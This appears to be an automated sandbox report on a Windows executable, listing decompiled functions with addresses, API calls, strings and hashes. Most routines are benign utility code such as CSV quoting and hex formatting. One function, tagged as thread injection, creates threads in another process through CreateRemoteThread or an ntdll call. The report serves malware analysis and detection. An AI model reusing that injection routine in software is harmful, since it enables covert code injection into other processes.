Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

0x00407362
0x00407369
0x0040736e
0x00407371
0x00407378
0x0040737e
0x00407381
0x00407386
0x0040739f
0x00407388
0x00407391
0x00407391
0x004073a4
0x004073ac
0x004073ad
0x004073cd
0x004073d0
0x004073d3
0x004073d6
0x004073e0
0x004073e7
0x004073ee
0x004073f5
0x0040741a
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00000000
0x00000000
0x004073fc
0x00407400
0x0040740f
0x00407412
0x00407412
0x00407402
0x00407402
0x00407407
0x00407407
0x00407413
0x00407419
0x00407419
0x00407419
0x0040742f
0x00407434
0x00407437
0x00407439
0x0040743b
0x0040743b
0x0040744e
0x00407453
0x00407453
0x004073af
0x004073b2
0x004073ba
0x004073bb
0x00000000
0x004073bd
0x004073c3
0x004073c3
0x004073bb
0x0040745c
0x00407468
0x00407468
0x0040746d
0x00407473
0x0040747c
0x0040748e

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

0x0040a27d
0x0040a286
0x0040a290
0x0040a29d
0x00000000
0x0040a32f
0x0040a29f
0x0040a2a4
0x0040a2ad
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2c4
0x0040a2c8
0x0040a2ce
0x0040a2e3
0x0040a2ed
0x0040a2fb
0x0040a2fe
0x0040a305
0x0040a30c
0x0040a30f
0x0040a313
0x00000000
0x0040a31a
0x0040a338

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

0x00401676
0x0040167e
0x0040168a
0x0040168c
0x00401690
0x00401691
0x00401696
0x0040169d
0x004016a2
0x004016aa
0x004016aa
0x004016aa
0x004016ad
0x004016ae
0x004016b3
0x004016b9
0x004016bb
0x004016bc
0x004016c1
0x004016c8
0x004016cd
0x004016ce
0x004016ea
0x004016ff
0x0040170c
0x004016d0
0x004016e3
0x004016e3
0x00401711
0x00401714
0x00000000
0x00401719
0x0040171c

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Lines, xrefs: 00401696
Line%d, xrefs: 004016AE

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405132
0x00405135
0x00405139
0x0040513e
0x00405141
0x004051b3
0x00405143
0x00405145
0x00405147
0x0040514c
0x0040514e
0x00405151
0x00405151
0x0040515b
0x0040515c
0x0040515d
0x0040515e
0x0040515f
0x00405168
0x00405169
0x00405171
0x00405173
0x00405174
0x00405182
0x00405184
0x00405189
0x0040518c
0x00405194
0x00000000
0x00000000
0x00405196
0x0040519a
0x0040519b
0x004051a1
0x00000000
0x00000000
0x00000000
0x004051a1
0x004051a3
0x004051a3
0x004051a6
0x004051af
0x004051b0
0x004051b7

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

LookupAccountSidW, xrefs: 0040907F
Y@, xrefs: 0040906D

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

SHGetSpecialFolderPathW, xrefs: 0040AC6F
shell32.dll, xrefs: 0040AC5B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

0x00406670
0x0040667a
0x00406680
0x00406686
0x0040668b
0x0040668d
0x00406693
0x00406699
0x0040669f
0x004066a9
0x004066ac
0x004066af
0x004066b9
0x004066c7
0x004066d9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d5
0x004066db
0x004066dd
0x004066e0
0x004066e8
0x004066fa
0x004066ea
0x004066ea
0x004066ed
0x004066f0
